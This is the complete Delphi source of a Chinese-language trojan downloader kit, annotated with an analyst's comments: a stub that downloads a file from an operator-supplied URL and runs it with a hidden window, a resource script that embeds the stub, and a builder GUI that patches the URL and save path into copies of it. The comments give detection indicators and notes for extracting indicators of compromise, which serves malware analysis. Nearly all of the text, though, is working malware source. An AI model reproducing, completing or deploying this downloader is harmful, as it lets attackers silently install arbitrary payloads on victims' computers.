server.dpr
// Analyst summary: minimal download-and-execute stub. It fetches the resource
// named by `url`, saves it to the path in `lf`, and launches the saved file.
// Both values are placeholders here; the companion builder (Unit1,
// TForm1.Button1Click) overwrites them inside the compiled binary.
program server;
// URLMon supplies UrlDownloadToFile; ShellApi supplies ShellExecute.
uses URLMon,ShellApi;//Windows;
var
// Placeholder fields filled with 'X'. The builder writes the operator-supplied
// URL and save path over them, NUL-padded, at OFFSET_URL / OFFSET_LFILE.
// NOTE(review): each run appears to be 64 characters, matching the 64-character
// padding used by the builder — confirm by count.
// Static indicator: an unpatched stub still contains these long 'X' runs.
url: pchar ='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
lf: pchar ='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
// Downloads SourceFile to DestFile through UrlDownloadToFile.
// Returns True only when the API returns 0 (S_OK); any exception yields False.
// Nothing here checks the scheme, the host, or the integrity of what is fetched.
function DownloadFile(SourceFile, DestFile: string): Boolean;
begin
try
Result := UrlDownloadToFile(nil, PChar(SourceFile), PChar(DestFile), 0, nil) = 0;
except
Result := False;
end;
end;
// Entry point: download, then launch the downloaded file if the download succeeded.
begin
if DownloadFile(url, lf) then
begin
// 'open' verb on the saved path; the final argument (nShowCmd) is 0, i.e. SW_HIDE,
// so no window is requested for the launched file.
// Detection: a URLMon download to disk followed at once by ShellExecute of that
// same path, with a hidden show command, is the behaviour to alert on.
ShellExecute(0, PChar('open'), PChar(lf),PChar(''), nil, 0);
// Disabled alternative launch call left in by the author.
//winexec(PChar(l),SW_HIDE);
end;
end.
server.rc
urlmm RCDATA server.exe
brcc.bat
rem Set PATH to the Delphi 7 bin directory so that Brcc32 can be found.
path=C:/Program Files/Borland/Delphi7/Bin;
rem Compile server.rc with the Borland resource compiler. Per server.rc, this
rem embeds server.exe as the RCDATA resource named "urlmm".
Brcc32 server.rc
主工程文件 (main project file of the builder):
// Project file of the builder GUI. Apart from the standard VCL start-up it links
// server.res, which is how the stub executable ends up inside this program.
program Project1;
uses
Forms,
Unit1 in 'Unit1.pas' {Form1};
{$R *.res}
// server.res is presumably the output of `Brcc32 server.rc`; that script embeds
// server.exe as RCDATA 'urlmm', the resource Button1Click looks up at run time.
// Static indicator: an executable carrying a second executable in an RCDATA
// resource with this name.
{$R server.res}
begin
Application.Initialize;
Application.CreateForm(TForm1, Form1);
Application.Run;
end.
生成木马主文件 (main unit of the trojan builder):
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls;
const
// Byte offsets, measured from the start of the written stub file, at which
// Button1Click overwrites the URL field and the local-path field
// (SetFilePointer ... FILE_BEGIN). The two fields start 68 bytes apart.
// NOTE(review): the values are hard-coded, so they presumably match one specific
// build of server.exe — confirm before relying on them for config extraction.
OFFSET_URL = 10528;
OFFSET_LFILE = 10596;
type
// Builder form: takes a download URL and a local save path, then writes a copy
// of the embedded stub with those two values patched in.
TForm1 = class(TForm)
Label1: TLabel;
Label2: TLabel;
// Download URL that is written into the stub at OFFSET_URL.
EdtUrl: TEdit;
// Local save path that is written into the stub at OFFSET_LFILE.
// Button3Click also writes its conversion result into this field.
EdtLFile: TEdit;
// Button1: generate the patched stub (Button1Click).
Button1: TButton;
// Button2: close the form (Button2Click).
Button2: TButton;
// Button3: run HexToDec on the EdtUrl text (Button3Click).
Button3: TButton;
procedure Button2Click(Sender: TObject);
procedure Button1Click(Sender: TObject);
procedure Button3Click(Sender: TObject);
private
{ Private declarations }
// Reinterprets the decimal digits of Value as hexadecimal digits and returns
// the resulting number as decimal text.
function HexToDec(const Value :Integer) : string;
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.Button2Click(Sender: TObject);
{ Click handler for Button2: closes this form. Sender is not used. }
begin
  Self.Close;
end;
// Click handler for Button1: writes the embedded stub to a file chosen by the
// user, then overwrites two fixed-offset fields in that file with the URL and
// the local save path taken from the form.
//
// Analyst notes:
// - The stub is read from this module's own RCDATA resource 'urlmm'.
// - In a generated sample the URL and the drop path are NUL-padded fields at
//   OFFSET_URL and OFFSET_LFILE, which is where to look when extracting IoCs.
// - No length check on either input is visible; each field write is a fixed
//   65 bytes.
// - Return values of WriteFile and SetFilePointer are not examined, and every
//   failed step in the resource lookup ends the handler silently.
procedure TForm1.Button1Click(Sender: TObject);
var
WriteBuff, ResultFilePath, ResourcePointer: PChar;
ResourceLocation: HRSRC;
ResourceSize, BytesWritten: Longword;
ResDataHandle: THandle;
FileHandle: THandle;
sf:TSaveDialog;
Url,LFile :string;
begin
// Both fields are mandatory. Message text: "Please enter the download address!",
// caption "Notice".
if trim(EdtUrl.Text)='' then
begin
Application.MessageBox(pchar('请输入下载地址!'), '提示信息', mb_iconinformation);
exit;
end;
// Message text: "Please enter the save path!".
if trim(EdtLFile.Text)='' then
begin
Application.MessageBox(pchar('请输入保存路径!'), '提示信息', mb_iconinformation);
exit;
end;
// Ask where to write the output; the dialog title reads "Generate trojan file".
sf :=TSaveDialog.Create(Application);
sf.DefaultExt :='exe';
sf.Title :='生成木马文件';
if not sf.Execute then exit;
Url :=trim(EdtUrl.Text);
LFile :=trim(EdtLFile.Text);
ResultFilePath := pchar(sf.FileName);
// Locate, size, load and lock the embedded stub (RCDATA 'urlmm') in this module.
ResourceLocation := FindResource(HInstance, 'urlmm', RT_RCDATA);
if ResourceLocation <> 0 then
begin
ResourceSize := SizeofResource(HInstance, ResourceLocation);
if ResourceSize <> 0 then
begin
ResDataHandle := LoadResource(HInstance, ResourceLocation);
if ResDataHandle <> 0 then
begin
ResourcePointer := LockResource(ResDataHandle);
if ResourcePointer <> nil then
begin
// CREATE_ALWAYS: an existing file at the chosen path is replaced.
FileHandle := CreateFile(ResultFilePath, GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
if FileHandle <> INVALID_HANDLE_VALUE then
begin
// Write the unmodified stub image first.
WriteFile(FileHandle, ResourcePointer^, ResourceSize, BytesWritten, nil);
// NOTE(review): purpose of this short pause is not evident from the code.
Sleep(10);
// Overwrite the URL field: the value padded with #0 to 64 characters, written
// as 65 bytes (presumably the 64 characters plus the string's terminating NUL).
SetFilePointer(FileHandle, OFFSET_URL, nil, FILE_BEGIN);
WriteBuff := PChar(Url + StringOfChar(#0, 64 - Length(Url)));
WriteFile(FileHandle, WriteBuff^, 65, BytesWritten, nil);
// Overwrite the local-path field in the same way.
SetFilePointer(FileHandle, OFFSET_LFILE, nil, FILE_BEGIN);
WriteBuff := PChar(LFile + StringOfChar(#0, 64 - Length(LFile)));
WriteFile(FileHandle, WriteBuff^, 65, BytesWritten, nil);
CloseHandle(FileHandle);
end;
end;
end;
end;
end;
end;
function TForm1.HexToDec(const Value: Integer): string;
{ Takes the decimal text of Value, reads its characters as base-16 digits and
  returns the resulting number as decimal text (for example 10 gives '16').
  IntToStr yields only '0'..'9' and '-', so the letter branch is not reached for
  that text; a leading '-' goes through the digit branch like any other
  character below 'A'. }
const
  LetterDigit: array['A'..'F'] of Integer = (10, 11, 12, 13, 14, 15);
var
  Digits: string;
  Acc: Integer;
  Idx: Integer;
  Ch: Char;
begin
  Digits := UpperCase(IntToStr(Value));
  Acc := 0;
  for Idx := 1 to Length(Digits) do
  begin
    Ch := Digits[Idx];
    if Ch >= 'A' then
      // Letter digit: look its value up in the table.
      Acc := Acc * 16 + LetterDigit[Ch]
    else
      // Anything below 'A': character code minus 48, the code of '0'.
      Acc := Acc * 16 + Ord(Ch) - 48;
  end;
  Result := IntToStr(Acc);
end;
procedure TForm1.Button3Click(Sender: TObject);
{ Click handler for Button3: converts the trimmed EdtUrl text with StrToInt,
  passes it through HexToDec and puts the result in EdtLFile. Does nothing when
  the field is empty; any exception from the conversion is swallowed, leaving
  EdtLFile unchanged. }
var
  Entered: string;
begin
  Entered := Trim(EdtUrl.Text);
  if Entered <> '' then
  begin
    try
      EdtLFile.Text := HexToDec(StrToInt(Entered));
    except
      // Deliberately ignored, as in the original handler.
    end;
  end;
end;
end.